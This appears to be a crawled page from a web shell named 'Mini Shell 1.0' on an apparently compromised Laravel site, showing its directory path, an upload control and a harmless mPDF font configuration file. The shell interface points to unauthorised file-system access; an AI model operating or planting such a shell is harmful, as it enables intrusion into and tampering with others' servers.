HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/thread-self/cwd/vendor/niklasravnsborg/laravel-pdf/src/
Upload File :
Current File : //proc/thread-self/cwd/vendor/niklasravnsborg/laravel-pdf/src/mpdf_ttfonts_config.php
<?php

use Illuminate\Support\Facades\Config;
define('_MPDF_SYSTEM_TTFONTS', Config::get('pdf.custom_font_path'));
$this->fontdata = array_merge($this->fontdata, Config::get('pdf.custom_font_data'));